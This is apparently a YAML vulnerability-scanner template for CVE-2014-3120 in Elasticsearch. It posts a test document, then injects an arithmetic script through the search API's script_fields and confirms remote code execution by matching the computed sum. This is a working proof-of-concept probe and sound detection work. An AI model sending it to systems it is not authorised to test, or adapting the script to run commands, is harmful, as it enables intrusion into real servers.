name: yaml-poc-elastic-elasticsearch-unsafe_config-CVE-2014-3120
binding: 6db9c338-406a-41a4-b797-440475bb3f2d
detail:
    author: system_user
    links:
        - http://bouk.co/blog/elasticsearch-rce/
        - http://www.exploit-db.com/exploits/33370
        - http://www.osvdb.org/106949
        - http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce
        - http://www.securityfocus.com/bid/67731
        - https://www.elastic.co/blog/logstash-1-4-3-released
        - https://www.elastic.co/community/security/
        - https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch
    vulnerability:
        id: 8df50ac1-428e-4912-b8cc-c1c01848e0dc
        level: high
transport: http
set:
    r: randomInt(800000000, 1000000000)
    r1: randomInt(800000000, 1000000000)
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /test/test1/123
            headers:
                Content-Type: application/json
            body: |
                {
                  "name": "test"
                }
        expression: response.status == 201 || response.status == 200
    r1:
        request:
            cache: true
            method: POST
            path: /_search
            headers:
                Content-Type: application/json
            body: |-
                {
                    "size": 1,
                    "query": {
                      "filtered": {
                        "query": {
                          "match_all": {
                          }
                        }
                      }
                    },
                    "script_fields": {
                        "command": {
                            "script": "{{r}}+{{r1}}"
                        }
                    }
                }
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
expression: r0() && r1()
